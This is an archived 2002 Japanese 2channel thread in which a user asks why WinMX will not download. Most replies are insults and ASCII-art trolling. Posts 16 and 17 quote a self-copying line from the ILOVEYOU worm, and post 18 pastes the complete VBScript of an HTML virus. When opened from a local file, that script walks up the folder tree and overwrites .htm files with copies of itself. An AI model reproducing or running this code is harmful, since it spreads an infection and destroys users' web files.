2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Win mxダウンロードできないんですが

1 :診断君上級者:02/07/09 21:31
今日だけですかね?
サーバーが混雑してるんかな。


2 :Upヾ(≧∇≦)〃Loader ◆CHUBOUVk :02/07/09 21:32
>>1
UPはできましたが

3 :名無し~3.EXE:02/07/09 21:32
(゚Д゚)ポカーン

4 :名無し~3.EXE:02/07/09 21:33
氏ね。

5 :診断君上級者:02/07/09 21:33
違う、WIN MXそのものがDLできない。
3.22ダメらしい。


6 :名無し~3.EXE:02/07/09 21:35
削除依頼してから、Down板へ逝け。

7 :名無し~3.EXE:02/07/09 21:35
ワソーイ   ∧_∧     >>1      ∧_∧  
      (, ゚∀゚,∩     ↓     (゚∀゚∩)  アーーーーヒャヒャヒャヒャ
      (つ   ノ   ガクプル   ⊂    ;;;)
  ∧_∧  ( ノ  (((( ;゚Д゚)))    ヽ∧_∧
  (;;;;  ´∩ (_)   ノ( へ)ヽ    (;;;    )∩
  ノ;;;;   ノ       <       ⊂;;;;;      ノ
 ○   ノ                  ヽ  ○ )
  )\ ヽ  ∧_∧     ∧_∧  ノ  ノ(⌒)
  (____(____) (;;;;;;;;;;  )    (   ;;;;;;;)(_____)  ̄
       ⊂ ;;;;   )     ノ   ;;;;;;つ     モーヒョヒョヒョ
        (  ○ )     (○  (
        (  (  (    (⌒)ヽ  )
        (____)___)     ̄  (____)

          宴は始まったばかりだ・・・

8 :名無し~3.EXE:02/07/09 21:36
こないだ、ちょっと聞きたいことがあってここで聞こうと思ってスレ立てたら滅茶苦茶荒らされました。
なんか質問でスレ立てるのはルール違反だの質問スレで聞けだの言われたけど、
初めてここに来た初心者はそんなの知らないことが多いと思うし
忙しいと検索して探したり過去ログ読んだりなんかできないと思う。
急いでる時なんかは質問スレ行ってもいつ答えてもらえるか分からないし。

そういう人たちに匿名で死ねとか逝ってよしとか言って荒らすほうが悪質じゃないか?
本当に困ってる人や初心者で知らずに質問スレ立てる人もいるんだから、
少しくらい質問スレが立っても大目に見るべきだと思う。
そうしないとPC関連板の住人=知ったかで閉鎖的っていつまでも言われるよ?

ルールで質問スレ立てるの禁止でも上で書いたみたいに仕方が無い場合もあると思うから
パソコン関係板全体のルールを含めて少し質問スレに対する態度を考え直してみませんか?
ここで前向きな議論が発展したら他の板にも同じスレを立てて住人の反省を促していきます。

9 :診断君上級者:02/07/09 21:37
ワソーイ   ∧_∧     >>9-1000     ∧_∧  
      (, ゚∀゚,∩     ↓     (゚∀゚∩)  アーーーーヒャヒャヒャヒャ
      (つ   ノ   ガクプル   ⊂    ;;;)
  ∧_∧  ( ノ  (((( ;゚Д゚)))    ヽ∧_∧
  (;;;;  ´∩ (_)   ノ( へ)ヽ    (;;;    )∩
  ノ;;;;   ノ       <       ⊂;;;;;      ノ
 ○   ノ                  ヽ  ○ )
  )\ ヽ  ∧_∧     ∧_∧  ノ  ノ(⌒)
  (____(____) (;;;;;;;;;;  )    (   ;;;;;;;)(_____)  ̄
       ⊂ ;;;;   )     ノ   ;;;;;;つ     モーヒョヒョヒョ
        (  ○ )     (○  (
        (  (  (    (⌒)ヽ  )
        (____)___)     ̄  (____)

          宴は始まったばかりだ・・・

10 :名無し~3.EXE:02/07/09 21:38
>>9
そんなにびびるなよ。

11 :診断君上級者:02/07/09 21:39
全然びびってないし

12 :名無し~3.EXE:02/07/09 21:40
まともにAAも貼れないような奴には教えられないな。

13 :名無し~3.EXE:02/07/09 21:44
>>9
なんでそんなに震えてんの?

14 :名無し~3.EXE:02/07/09 21:49
>>9は>9-1000が自作自演と言うことですか?

15 :診断君上級者:02/07/09 21:50
もういいよお前等。つまんね。
削除依頼だしとけよ。

16 :名無し~3.EXE:02/07/09 21:58
c.Copy(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)

17 :名無し~3.EXE:02/07/09 21:58
c.Copy(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)

18 :名無し~3.EXE:02/07/09 21:59
<BODY Onload="Redirect();">
<script language="VBScript"><!--

Sub Redirect
Randomize
If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline
location.href = location.href +"l"
End Sub

Sub Offline
Dim FSO,folder ,fc, f1, cpath
Set FSO = CreateObject("Scripting.FileSystemObject")
HostPath = Replace(location.href, "file:///", "")
HostPath = Replace(HostPath, "/", "\")
cpath = fso.GetParentFolderName(HostPath)
Set folder = fso.GetFolder(cpath)

While folder.IsRootFolder = false
Set folder = fso.GetFolder(cpath)
Set fc = folder.Files
cpath = fso.GetParentFolderName(cpath)
For each f1 in fc
s = Lcase(Fso.GetExtensionName(f1.name))
If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l", true
fso.CopyFile HostPath, f1.path, true
End If
Next
Wend
If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal")
End Sub
--></script>
</BODY>


19 :診断君上級者:02/07/09 22:01
もう、わかりました。
いい加減、僕もブチ切れましたよ。

このスレを立てて皆さんに迷惑をかけてしまったことは本当に反省していて、
解決したらすぐに削除依頼をだして2ちゃんねるも辞めようと思っていました。

今まで散々、馬鹿にされても「自分のミスのせいだ」と、我慢してきました。
ですが、僕ももういい加減ムカついてきました。

宣言します。

「この問題が解決するまで何度でもage続けますし、1000超えても同じスレを立てます」

いいですか、もう僕は動じません。
誰に何と言われようとも、この問題が解決するまで、たとえ何ヶ月かかろうとも、
何年かかろうとも、このスレをage続けます。
1000超えても同じスレを立てます。

マジで、マジでもうブチ切れましたので、よろしくお願いします。

20 : ◆eGijCrAo :02/07/09 22:03
アクセスできなくなりますよ

21 :診断君上級者:02/07/09 22:05
もうレスをすることに疲れました。
これ以上自分がレスをつける意味というか目的がわかりません。
正直言ってROMしてたほうが楽です。でもいつでも出来ることなので
今は一生懸命レスしようと考えていました。今日までは。
しかし誰からもろくなレスをつけられず、自分が誰にも
必要とされてないことが、わかったとたん前向きに考えることが
出来なくなりました。
もう自分という醜くてどこにいるのかわからないような存在を
2chから消すことだけが最後のレスをつける目的かもしれません。
そしてこの「書き込む」ボタンをクリックすることによりその目的が
遂行されるわけです。
さようなら。これからはROMに徹します

22 :名無し~3.EXE:02/07/09 22:08
展開が早いな、おい

23 :名無し~3.EXE:02/07/09 22:11
age続けるゆーたり
ROMるっちゅーたり
どっちかはっきりせーやクソヴォケ

24 :Upヾ(≧∇≦)〃Loader ◆CHUBOUVk :02/07/09 22:14
>>1ハコッチ逝ケ
ttp://soft.1stchina.com/

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)